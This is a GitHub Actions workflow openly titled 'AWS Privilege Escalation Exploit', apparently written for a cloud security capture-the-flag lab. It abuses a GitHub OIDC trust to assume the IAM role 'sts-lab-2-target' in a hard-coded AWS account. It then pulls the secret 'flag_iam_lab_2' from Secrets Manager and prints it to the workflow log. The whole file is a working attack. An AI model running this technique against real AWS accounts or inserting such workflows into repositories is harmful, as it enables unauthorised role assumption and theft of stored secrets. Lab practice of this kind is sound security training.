name: 'AWS Privilege Escalation Exploit'

on:
  workflow_dispatch: # Allows manual execution

permissions:
  id-token: write  # Needed to request an OIDC token
  contents: read   # Needed to read the repository contents

jobs:
  escalate:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout Code
      uses: actions/checkout@v3

    - name: Configure AWS Credentials
      uses: aws-actions/configure-aws-credentials@v1
      with:
        aws-region: us-east-1
        role-to-assume: arn:aws:iam::683350395763:role/sts-lab-2-target  # Role ARN to assume
        role-session-name: EscalationSession

    - name: Get Caller Identity
      run: aws sts get-caller-identity
      shell: bash

    - name: Read the Secret from AWS Secrets Manager
      run: |
        aws secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:683350395763:secret:flag_iam_lab_2-moX8Vx" --query 'SecretString' --output text
      shell: bash
